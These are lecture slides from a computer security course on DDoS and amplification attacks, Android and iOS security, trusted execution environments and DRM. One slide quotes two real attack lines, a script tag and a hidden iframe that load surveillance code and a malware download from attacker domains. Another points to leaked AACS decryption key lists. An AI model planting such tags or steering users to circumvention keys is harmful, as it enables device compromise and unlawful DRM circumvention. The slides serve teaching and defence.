week 13: ddos, mobility, drm

64
CS 419: Computer Security Paul Krzyzanowski © 2020 Paul Krzyzanowski. No part of this content, may be reproduced or reposted in whole or in part in any manner without the permission of the copyright owner. Week 13: DDoS, Mobility, DRM

Upload: others

Post on 10-May-2022

1 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Week 13: DDoS, Mobility, DRM

CS 419: Computer Security

Paul Krzyzanowski © 2020 Paul Krzyzanowski. No part of this content, may be reproduced or reposted in whole or in part in any manner without the permission of the copyright owner.

Week 13: DDoS, Mobility, DRM

Page 2: Week 13: DDoS, Mobility, DRM

Denial of Service

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 2

Page 3: Week 13: DDoS, Mobility, DRM

Denial of Service (DoS) Attacks• Find bugs– Get the system to crash

• Overwhelm a system so it will not be be responsive Challenge: overwhelm targets that may be far bigger than you– Find asymmetries• Cases where handling requests is more expensive than issuing them

– Avoid getting responses• Fake return addresses

– Send responses to the target• Set the return address to the target ⇒ amplification

– Join forces• Get many systems to participate ⇒ create a botnet for a Distributed DoS (DDoS) attack• Systems contact a command & control server for directions

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 3

Page 4: Week 13: DDoS, Mobility, DRM

Bugs & Asymmetric attacks• Challenge Collapser– Attacker sends URLs that require time-consuming operations on the server

• ICMP attacks– Ping flood• Send ICMP Echo Request messages with responses that go to the target

– Ping of Death• Send fragmented IP packets so that they will be >64KB when reassembled ⇒buffer overflow

– Send spoofed source addresses to unreachable destinations• Routers will return Destination Unreachable to the target

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 4

Page 5: Week 13: DDoS, Mobility, DRM

Amplification AttacksSend a small request that produces a large response– Have the response go to the target– Need UDP so there's no connection state

• DNS amplification– Request as much info as possible about a domain– Responses may be 179x larger than requests

• NTP amplification– Request monlist: server returns the last 600 hosts that connected to it– Responses may be 500x larger than requests

• Memcached amplification– Send queries to open memcached servers that return large responses (often web caches)

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 5

Page 6: Week 13: DDoS, Mobility, DRM

DDoS: Distributed Denial of Service• Vast quantities of compromised systems reduce need for

amplification– Create a botnet of millions of systems

• Some targets are too huge to hurt with traffic– Amazon, Google, sites using CDNs such as Akamai

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 6

Page 7: Week 13: DDoS, Mobility, DRM

Dealing with DDoSReally difficult in general• Disable unnecessary UDP services– So you're not a participant in the attacks

• Enable bandwidth management in routers– Either in data center or ISP– Limit outbound or inbound traffic on a per-IP basis

• Blackhole routing– Set a null route route when DNS attack was detected– Traffic to attacked DNS goes nowhere

• Egress filtering by ISPs– Attempt to find malicious hosts participating in DDoS or sending spam

• Identify incoming attackers & block traffic at firewall– Difficult with a truly distributed DDoS attack

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 7

Page 8: Week 13: DDoS, Mobility, DRM

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 8

AWS said it mitigated a 2.3 Tbps DDoS attack, the largest everThe previous record for the largest DDoS attack ever recorded was of 1.7 Tbps, recorded in March 2018.Catalin Cimpanu • June 17, 2020

Amazon said its AWS Shield service mitigated the largest DDoS attack ever recorded, stopping a 2.3 Tbps attack in mid-February this year.

The incident was disclosed in the company's AWS Shield Threat Landscape [PDF], a report detailing web attacks mitigated by Amazon's AWS Shield protection service.

The report didn't identify the targeted AWS customer but said the attack was carried out using hijacked CLDAP web servers and caused three days of "elevated threat" for its AWS Shield staff.

CLDAP (Connection-less Lightweight Directory Access Protocol) is an alternative to the older LDAP protocol and is used to connect, search, and modify Internet-shared directories.

The protocol has been abused for DDoS attacks since late 2016, and CLDAP servers are known to amplify DDoS traffic by 56 to 70 times its initial size, making it a highly sought-after protocol and a common option provided by DDoS-for-hire services.

https://www.zdnet.com/article/aws-said-it-mitigated-a-2-3-tbps-ddos-attack-the-largest-ever/

Page 9: Week 13: DDoS, Mobility, DRM

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 9

Mobile Device Security

Page 10: Week 13: DDoS, Mobility, DRM

Threat Landscape

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 10

Page 11: Week 13: DDoS, Mobility, DRM

Mobile Devices: Users• Lots of users!– 1.6B Android users, ~1B iOS users– Much of the world is mobile-first

• Users don't think of phones as computers– Social engineering may work more easily on phones

• Small form factor– Users may miss security indicators (e.g., certificates on web sites)– Easy to lose/steal a device

• Users tend to pick bad PINs

• Users may grant app permission requests without thinkingDecember 1, 2020 CS 419 © 2020 Paul Krzyzanowski 11

https://9to5mac.com/2020/01/28/apple-hits-1-5-billion-active-devices-with-80-of-recent-iphones-and-ipads-running-ios-13/

U.S.: Android: 47%, iOS: 52.4%Worldwide: Android: 72.92%, iOS: 26.53%

https://gs.statcounter.com/os-market-share/mobile/worldwide

Page 12: Week 13: DDoS, Mobility, DRM

Mobile Devices: Interfaces• Phones have lots of sensors– GSM/3G/4G LTE/5G – Wi-Fi – Bluetooth – GPS – NFC – Microphone– Cameras – 6-axis Gyroscope and Accelerometer – Barometer– Magnetometer (compass) – Proximity – Ambient light – LiDAR– Fingerprint – Face

• Sensors enable attackers to monitor the world around you– Where you are & whether you are moving– Conversations– Video– Sensing vibrations due to neighboring keyboard activity led to a word recovery

rate of 80%

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 12

Page 13: Week 13: DDoS, Mobility, DRM

Mobile Devices: Apps• Lots of apps– 2.87 million Android apps on Google Play – 1.96 million iOS apps on the Apple App Store*

• Most written by untrusted parties– We'd be wary of downloading these on our PCs– With mobile apps we rely on• Testing & approval by Google (automated) and Apple (automated + manual)• App sandboxing• Explicit granting of permissions for resource access

• Apps often ask for more permissions than they use– Most users ignore permission screens

• Most apps do not get security updates

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 13

*Statista.com, as of 3rd quarter 2020

Page 14: Week 13: DDoS, Mobility, DRM

Mobile platforms aren't impervious

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 14

Page 15: Week 13: DDoS, Mobility, DRM

Mobile Devices: Platform• Mobile phones are comparable to desktop systems in complexity– The OS & libraries will have bugs

• Single user environment

• Limited screen space– No hovering, no multiple browser windows (usually)

• Malicious apps may be able to get root privileges– Attackers may install rootkits, enabling long-term control while concealing their

presence

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 15

Page 16: Week 13: DDoS, Mobility, DRM

Some apps are preinstalled (Android)

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 16

Malware Found Pre-Installed on Low-Cost Android SmartphonesPhones Sold Through U.S. Government-Subsidized ProgramPrajeet Nair – July 10, 2020

For the second time this year, security researchers have found malware embedded in low-cost Android smartphones distributed through a U.S. government program, security firm Malwarebytes reports.

In this latest case, Malwarebytes analysts found the malware embedded in the "settings" feature of the Android smartphone making it nearly impossible to detect or remove from the devices, according to a new research report.

Malwarebytes obtained an infected ANS UL40 smartphone and studied the malware embedded in the device, according to the report.

https://www.databreachtoday.com/malware-found-pre-installed-on-low-cost-android-smartphones-a-14594

Page 17: Week 13: DDoS, Mobility, DRM

Example: fake Facebook authentication• July 2020– 25 apps discovered in the Google Play Store that

trick Facebook users to give authentication credentials

• Apps infect target phones with malware– Detects opening of the Facebook app– Launches a browser and navigates to

Facebook’s login window– Malware uses JavaScript to copy login

credentials and send them to a server

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 17

https://www.evina.com/they-steal-your-facebook/

Page 18: Week 13: DDoS, Mobility, DRM

December 1, 2020 18

http

s://w

ww

.ther

egis

ter.c

o.uk

/201

7/07

/20/

ios_

secu

rity_

skyc

ure/

Ways to Infiltrate an iOS DeviceHere are a few ways to get malware onto an iOS device, along with examples of real exploits that used that method.

Page 19: Week 13: DDoS, Mobility, DRM

Threats• Privacy– Data leakage– Identifier leakage– Location privacy– Microphone/camera access

• Security vulnerabilities– Bugs– Phishing– Malware– Malicious Android intents (inter-app communication)– Broad access to resources (more than the app needs)

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 19

Page 20: Week 13: DDoS, Mobility, DRM

iOS input validation vulnerabilities in Messages• May 2015: "Unicode of Death"– Single string in a text message could crash an iPhone

• Again in Jan 2018: "ChaiOS"– Receiving a link causes the messages app to go blank & crash instantly after opening– Malformatted characters in the message causes the Webkit HTML engine to crash– The target file contains multiple such characters, so CoreText spends a lot of CPU time trying to match fonts for them

• Again in Feb 2018– A character in an Indian language (Telugu) causes Apple's iOS Springboard to crash when the message is received– Messages will no longer open as it fails to load the character– Affects third-party messaging apps too

• Again in May 2018: Black dot of death– Thousands-character-long string of invisible Unicode text causes iMessages to crash when the user launches the app

• Again in April 2020: Sindhi characters– Several characters from the Sindhi language that cause iOS to lock up and an iPhone to crash

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 20

Page 21: Week 13: DDoS, Mobility, DRM

Another data validation problem…

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 21

Wallpaper crash explained: Here’s how a simple image can soft-brick phonesBogdan Petrovan • June 1, 2020

How can a simple image crash an Android phone to the point that it becomes unusable?…

Here’s a recap: Setting a particular image as wallpaper can send some phones into a loop of crashes that makes them unusable.

There are a few solutions, depending on how hard the phone is hit. Some users were able to change the wallpaper in the short interval between crashes. Others had success deleting the wallpaper using the recovery tool TWRP. But in most cases, the only solution was to reset the phone to factory settings, losing any data that’s not backed up.

https://www.androidauthority.com/android-wallpaper-crash-1124577/

Page 22: Week 13: DDoS, Mobility, DRM

iOS: August 2019, Jan-Mar 2020Google’s Project Zero team discovered websites that allow an intruder to implant code simply by having the victim visit a website– Five exploit chains affect iOS versions 10-12 over a period of at least 2 years– Exploited 14 vulnerabilities• 7 browser vulnerabilities — 5 kernel vulnerabilities• 2 sandbox escapes – at least one was 0-day at the time of discovery

– Websites installed monitoring malware• Monitor location data, grab photos, contacts, and passwords from the iOS keychain• No encryption was broken but attackers could grab decrypted data from sending & receiving

messaging apps

• Biggest known iPhone hacking incident– Suspected to be a state-backed attack sponsored by Chinese APT groups– Designed to target the Uyghur community in Xinjiang

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 22

https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html

Page 23: Week 13: DDoS, Mobility, DRM

Android users targeted as well – June 2020Multiple attack vectors used

• Scanbox framework<script src=”https://stats.uyghurmedia[.]top:443/i/?3″></script>

– Load Scanbox framework to collect data and transmit via HTTP POST

• Download malicious code to target the Chrome browser<iframe src=”https://akademlye.org/ztTXvf” width 0 height 0 visibility hidden></iframe>

– Deception: i in akademiye relaced with an L– Causes a forced download of a file named loader which is an executable file that sends

data about the device to the attacker via HTTP POST

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 23

Page 24: Week 13: DDoS, Mobility, DRM

Example iOS malware2015: XcodeGhost: affected over 4000 apps• Infected Xcode developer software hosted on the Baidu file sharing service

• Developers who downloaded this version of Xcode would create apps with malware– Remote control via commands from a command web server– Send information: time, app's name/ID, network time– Ability to hijack apps that support iOS's Inter-App Communication URL

mechanism• Whatsapp, Facebook, iTunes

– Access clipboard

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 24

Page 25: Week 13: DDoS, Mobility, DRM

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 25

Apple patches iOS against 3 actively exploited 0-days found by GoogleProject Zero has reported 7 actively exploited zerodays in the past two weeks.Dan Goodin • November 5, 2020

Apple has patched iOS against three zero-day vulnerabilities that attackers were actively exploiting in the wild. The attacks were discovered by Google’s Project Zero vulnerability research group, which over the past few weeks has detected four other zero-day exploits—three against Chrome and a third against Windows.

The security flaws affect iPhone 6s and later, seventh-generation iPod touches, iPad Air 2s and later, and iPad mini 4s and later. The flaws are:

• CVE-2020-27930, a code-execution vulnerability that attackers can trigger using maliciously crafted fonts• CVE-2020-27950, which allows a malicious app to obtain the locations in kernel memory, and• CVE-2020-27932, a bug that allows code to run with highly privileged system rights.

Page 26: Week 13: DDoS, Mobility, DRM

Example Android malware• 2016: HummingBad – affected over 10 million devices– Developed by a Chinese advertising company– Can take control of devices, forcing users to click ads and download apps

• 2019: camera control – affected hundreds of millions of users– Attackers can take control of the camera in the background– Record video or take phones while devices is locked– Affected Google & Samsung phones

• 2019: full control– Google's Project Zero discovered a vulnerability that gives attackers full control– Affected at least 18 different phone models

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 26

Page 27: Week 13: DDoS, Mobility, DRM

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 27

This Critical Android Security Threat Could Affect More Than 1 Billion Devices: What You Need To KnowDavey Winder • May 26, 2020

Another week, another critical security warning. Here’s what most Android users need to know about StrandHogg 2.0…The risk being that, if exploited by an attacker, this vulnerability could lead to an elevation of privilege and give that hacker access to bank accounts, cameras, photos, messages and login credentials, according to the researchers who uncovered it. What's more, it could do this by assuming "the identity of legitimate apps while also remaining completely hidden."…Rather than exploit the same TaskAffinity control setting as the original StrandHogg vulnerability, StrandHogg2.0 doesn't leave behind any markers that can be traced. Instead, it uses a process of "reflection," which allows it to impersonate a legitimate app by using an overlay into which the user actually enters credentials. But that's not all; it also remains entirely hidden in the background while hijacking legitimate app permissions to gain access to SMS messages, photos, phone conversations, and even track GPS location details.

https://www.forbes.com/sites/daveywinder/2020/05/26/critical-android-data-stealing-security-threat-confirmed-for-almost-all-android-versions-strandhogg-google-update-warning/?sh=175793d82c82

Page 28: Week 13: DDoS, Mobility, DRM

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 28https://source.android.com/security/bulletin/2020-10-01

Android Security Bulletin—October 2020

Android runtimeThe vulnerability in this section could enable a local attacker to execute arbitrary code within the context of an application that uses the library.

CVE References Type Severity Updated AOSP versionsCVE-2020-0408 A-156999009EoP High 8.0, 8.1, 9, 10, 11

FrameworkThe most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

CVE References Type Severity Updated AOSP versionsCVE-2020-0420 A-162383705 EoP High 11CVE-2020-0421 A-161894517 EoP High 8.0, 8.1, 9, 10, 11CVE-2020-0246 A-159062405 ID High 10, 11CVE-2020-0412 A-160390416 ID High 8.0, 8.1, 9, 10, 11CVE-2020-0419 A-142125338 ID High 8.1, 9, 10, 11

Page 29: Week 13: DDoS, Mobility, DRM

Android Security

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 29

Page 30: Week 13: DDoS, Mobility, DRM

Application Needs

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 30

IntegrityApp shouldn’t be modified between creation & installation

IsolationEach app needs private data and be protected from other apps

SharingAccess to shared storage and devices, including the network

Inter-app servicesSend messages to other apps to invoke services –when allowed

PortabilityApps should run on different hardware architectures

Page 31: Week 13: DDoS, Mobility, DRM

App Sandboxing• Android is built on SELinux

• Apps are isolated and can only access their resources

• Sandboxing enforced by Linux– Android is a single-user system– Each app• is assigned a unique user ID on installation• runs as a separate process• has a private data folder

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 31

Core Android services also have their own user IDs1001 Telephony1002 Bluetooth1003 Graphics1004 Input devices1005 Audioetc.

Page 32: Week 13: DDoS, Mobility, DRM

App Sandboxing: file permissionsTwo mechanisms are used1. Linux file permissions (discretionary access control)

– Owner & root can change permissions– Allows an app to share a data file

2. SELinux mandatory access control – Various data & cache directories– Owner cannot change access permissions

Storage• External storage: Shared among all apps

• Internal storage: Per-app private directory

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 32

Page 33: Week 13: DDoS, Mobility, DRM

App = set of components• PC apps have a single launching point & run as a monolithic process

• Android apps contain multiple components– Activities– Services– Broadcast receivers– Content providers

• Example: take and share a photo in Instagram– Instagram requests the camera app– Android OS launches the camera app to handle the request• User now sees the camera app and no longer interacts with the Instagram app

– Camera app may access other services, such as a file chooser, that will launch another app– User exits the launched app(s), returns to Instagram, and shares the photo

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 33

Page 34: Week 13: DDoS, Mobility, DRM

PermissionsApps need permissions to access services– System resources: logs, battery levels, …– System interfaces: Internet, Bluetooth, send SMS, send email, …– Sensitive data: SMS messages, contacts, email, …– App-defined services

Services are assigned protection levels:

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 34

Normal Default - no danger to users or system

Dangerous Access that can compromise the system or privacy – user has to approve during installation or runtime

Signature Access granted if the app signed by the same developer & contains the same certificate

SignatureOrSystem Like signature but access granted if a system application is requesting it

Page 35: Week 13: DDoS, Mobility, DRM

IntentsAndroid apps communicate with system services, between app components, and with other apps via intents

• Intent = messaging objects {action, data to act on, component to handle the intent} used to– Start a service (background) • Start an activity (user-facing & foreground) • Deliver notifications

(broadcasts)

• Explicit intents– App identifies the target component in the intent

• Implicit intents– App asks Android to find a component based on its data

E.g., view a web page

App registers its available intents when it is installed– If several apps register the same intent, the user selects which should be used (e.g., multiple browsers)

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 35

Page 36: Week 13: DDoS, Mobility, DRM

Intents vs. Permissions• Intents declare app capabilities– Associate actions with components & how they are started

• Permissions– Identify whether one app is allowed to access another app’s component

• Access to components passes through the gatekeeper, which validates requests

Intents = mechanism

Permissions = policy

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 36

Man

ifest

(labe

ls)

ActivityRepresents a single

screen in an app

ServiceComponent that

works in the background

gatekeeper

Another app

Intent Intent

Page 37: Week 13: DDoS, Mobility, DRM

Platform Security• Android creates a read-only partition for the kernel, system libraries, and the

app framework– Even malicious apps with elevated privileges cannot modify.

• Root privileges– Powerful – but not granted to apps

• Verified boot– Each stage is signed and verified

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 37

Page 38: Week 13: DDoS, Mobility, DRM

File Encryption• File-based encryption– Device Encrypted (DE) storage: available during boot and after a user unlocked

the device– Credential Encrypted (CE) storage: available only after the user unlocked the

device

• Uses Linux ext4 file system or F2FS – 512-bit AES file encryption keys– Stored in the Trusted Execution Environment (TEE) • A separate part of the processor with protected memory running its own OS (Trusty) and

communicates with the Linux kernel only via a well-defined messaging API

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 38

Page 39: Week 13: DDoS, Mobility, DRM

App Integrity• Signed applications– Apps must be signed. Signature validated by Google Play & package manager

on the device

• App verification– Users can enable "verify apps" to have apps evaluated by an app verifier prior to

installation– Will scan app against Google's database of apps

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 39

Page 40: Week 13: DDoS, Mobility, DRM

Exploit PreventionAndroid code & Linux execution environment uses– Stack canaries– Some heap overflow protections (check backward & forward pointers)– ASLR– No-execute (NX) hardware protection to prevent code execution on the heap or stack

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 40

Page 41: Week 13: DDoS, Mobility, DRM

iOS Security

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 41

Page 42: Week 13: DDoS, Mobility, DRM

Boot process• Boot ROM – trusted read-only component– Contains boot code & Apple root certificate

• Boot ROM ⇒ Loads Low-Level Boot Loader (LLB)

⇒ loads iBoot⇒ loads iOS kernel

• Each step verifies the signature of the next package

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 42

Page 43: Week 13: DDoS, Mobility, DRM

Data security: encrypted file system & encrypted files• Each file gets a random 256-bit AES file key when it is created

• File key is encrypted with a class key– Class = user or group; depends on who should access the file

• Metadata contains file key and info on the class that protects it– Can also specify per-extent keys: portions of a file can be given different keys

• File metadata is decrypted with the file system key– File system key = random key created when iOS is installed

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 43

File contentsFile metadata

File keyClass keyPasscode

key

Hardware key

File system key

Page 44: Week 13: DDoS, Mobility, DRM

App SandboxAll third-party apps are sandboxed

• Apple kernel-level sandbox– Per-app policy definition file– Enforcement of system calls and parameters– Controls access to files, system hardware, network

• Each app has a unique home directory for its files– Restricted from accessing files stored by other apps or making changes to the device

• System files and resources are shielded from the user’s apps

• Apps run as a non-privileged user “mobile”

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 44

Page 45: Week 13: DDoS, Mobility, DRM

iOS App Security• Runtime protection– System resources & most syscalls not directly accessible by user apps – must use iOS APIs– App sandbox restricts access to other app's data & resources– Inter-app communication through iOS APIs– Entire OS partition is read-only– Code generation prevented – memory pages cannot be made executable

• Mandatory code signing– Must be signed using an Apple Developer certificate– Root certificate is stored in the hardware – used to validate OS updates– iOS performs runtime code signature checks of all executable memory pages

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 45

Page 46: Week 13: DDoS, Mobility, DRM

Apps: Entitlements & Extensions• Entitlements– Signed key-value pairs that are granted to an app to allow access to services

• Extensions– Executable binaries packaged within an app that provide functions to other apps– Sandboxed and run in their own address space– Entitlements restrict extension availability to specific apps

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 46

Page 47: Week 13: DDoS, Mobility, DRM

Runtime environment• Signature checking of each page loaded from an app while executing

• Address space layout randomization (ASLR)

• Memory execute protection – ARM’s Execute Never (XN) feature

• Stack canaries

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 47

Page 48: Week 13: DDoS, Mobility, DRM

Trusted Execution Environment (TEE)

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 48

Page 49: Week 13: DDoS, Mobility, DRM

Keeping keys secret• For security, we rely on– Keys– Encryption, decryption services– Signing services– Biometric data

• This data needs to be kept secure– Along with other data, like payment credentials

• Trusted Execution Environment– Isolated environment for data storage & trusted services

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 49

Page 50: Week 13: DDoS, Mobility, DRM

Hardware aids to security: ARM TrustZone• Hardware-isolated secure & non-secure worlds– Each CPU core has two virtual cores: secure & non-secure

• Processor executes in one world at anygiven time

• Each world has its own OS & applications

• Software resides in the secure or non-secure world– Non-secure (non-trusted) applications cannot

access secure resources directly

• Proof of device: private key stored in trusted area

• Applications– Secure key management & key generation– Secure boot, digital rights management, secure payment

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 50http://www.arm.com/products/security-on-arm/trustzone

Non-secure

Secure

Page 51: Week 13: DDoS, Mobility, DRM

Android Trusty Trusted Execution Environment• Trusty TEE– Isolated from the rest of Android via hardware & software– Trusty runs on the same processor as the Android Linux kernel– Intel hardware: uses Intel’s Virtualization Technology– Hardware support• ARM: Trustzone™• Intel Virtualization Technology

• Trusty contains– OS kernel derived from Little Kernel (https://github.com/littlekernel/lk)– Linux driver to transfer data between the secure Trusty environment & Android– Android userspace library to communicate with trusted applications

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 51

Page 52: Week 13: DDoS, Mobility, DRM

Android Trusty Trusted Execution Environment• Processes in Trusty– Each process runs in unprivileged mode and is isolated from others via memory

management – All applications are developed by a single party and packaged with the Trusty kernel

image, which is signed– Verified by the bootloader during boot

• Uses for Trusty– Gatekeeper subsystem• Enrolls and verifies passwords via an HMAC

– DRM framework for protected content• TEE stores device-specific keys needed to decrypt content• Main processor sees only the encrypted content and not the keys

– Mobile payments

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 52

Page 53: Week 13: DDoS, Mobility, DRM

iOS: Apple Secure EnclaveSimilar to TrustZone but a separate processor– Coprocessor in Apple A7 and later processors: iPhones, TV, Watch, HomePods, Macs– Runs its own OS (modified L4 microkernel)– Has its own secure boot & custom software update– Provides

– Maintains integrity of data protection even if kernel has been compromised– Uses encrypted memory– Communicates with the main processor by an interrupt-driven mailbox and shared

memory buffers

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 53

• All cryptographic operations for data protection & key management• Random number & key generation• Secure key store (including UID & GID keys)• Biometric auth, including Touch ID (fingerprint) and the neural network for Face ID• Authentication for secure payments

Page 54: Week 13: DDoS, Mobility, DRM

Summary• Mobile devices are attractive targets– Huge adoption, simple app installation by users, always with the user

• Android security model– Isolated processes with separate UID and separate VM– Java/Kotlin code (mostly, but also native): managed, no buffer overflows– Permission model & communication via intents

• iOS security model– App sandbox based on file isolation– File encryption– Apps written in Swift (older ones in Objective C)– Vendor-signed code, closed marketplace (App Store only)

• Protection efforts have generally been good– Usually far better than on normal computers … but often not good enough!

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 54

Page 55: Week 13: DDoS, Mobility, DRM

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 55

Content Protection

Page 56: Week 13: DDoS, Mobility, DRM

Content protection• Digital content is simple to copy and distribute– Software, music, video, documents

• That's not always good– How do software companies & artists make a living if their content is freely

distributed on a large scale?• Maintain revenue streams• Enforce distribution rights (e.g., video available in the U.S. first)

– How do organizations keep their documents secure?• Enforce confidentiality & protect trade secrets?

How can we make illegal content access difficult?

December 1, 2020 CS 419 © 2019 Paul Krzyzanowski 56

Page 57: Week 13: DDoS, Mobility, DRM

DRM• Content industry (movies, music, documents) asked for technical

solutions to the content distribution problem

• This led to digital rights management (DRM)– Protection of content – Definition on how it can be played and copied

• Not just documents, music, & movies:– Printer cartridges– Keurig coffeemakers • RFID connections enforce use of Keurig-branded K-cups

– John Deere tractors

December 1, 2020 CS 419 © 2019 Paul Krzyzanowski 57

Page 58: Week 13: DDoS, Mobility, DRM

Basic DRM concepts• To deliver content securely, encrypt it

• Store the keys on a DRM server along with access rights

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 61

DRM server(keys & access info)

Content server(encrypted content)

(1) Authenticate(2) Request key for content (KeyID)

(4) Stream content

(3) Get key & access rights for KeyID

Content Decryption Module (CDM)(decrypts content)

Page 59: Week 13: DDoS, Mobility, DRM

Video Decode & Playback• The CDM needs to be trustworthy– Don't leak the decryption key– Enforce playback rules– Don't leak the content

• CDMs are closed-source

• Need direct path to hardware

• Key rotation just in case

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 62

Content Decryption Module (CDM)(decrypts content)

Page 60: Week 13: DDoS, Mobility, DRM

Use of the Trusted Execution Environment (TEE)• Software can decrypt content but– It can be inspected– Modified– Output can be redirected

• DRM decryption is usually done in hardware – in the TEE

• Content providers may alter content based on the playback device

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 63

TEEDRM server

Content serverHDMI with HDCP

Request(KeyID)signed by vendor

[Content Key & rights]encrypted for vendor

Vendor's certificate

Page 61: Week 13: DDoS, Mobility, DRM

Widevine Content protectionThree security levels• L1: Most secure – used by most streaming services– Requires TEE

• L2: TEE only performs cryptographic operations

• L3: All operations are done outside the TEE– Usually allows only 480p or lower resolution playback

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 64

Page 62: Week 13: DDoS, Mobility, DRM

Content isn't really protected• "Trusted players" running on observable platforms (e.g., PCs) can be

examined– DVD & BluRay algorithms and keys were leaked this way– Do a google/bing search for AACS KEYDB.cfg• http://fvonline-db.bplaced.net• https://gist.github.com/HenkPoley/41ed899251aa771cb1d061d49a3888e5

– 18 processing keys– 23,999 titles as of 9/3/2017

There's also the analog hole

December 1, 2020 CS 419 © 2020 Paul Krzyzanowski 65

Page 63: Week 13: DDoS, Mobility, DRM

Legal barriers: DMCA

Digital Millennium Copyright ActCriminalizes production and dissemination of technology, devices, or services intended to circumvent measures (DRM) that control access to copyrighted works. It also criminalizes the act of circumventing an access control, whether or not there is actual infringement of copyright itself.

Without DMCA, anyone would be able to build a set-top box to decode video signals– Just crack HDCP (High Definition Content Protection)

Also– Licensing agreements (EULAs)– EU’s Copyright Directive

December 1, 2020 CS 419 © 2019 Paul Krzyzanowski 66

Page 64: Week 13: DDoS, Mobility, DRM

The End

December 1, 2020 67CS 419 © 2020 Paul Krzyzanowski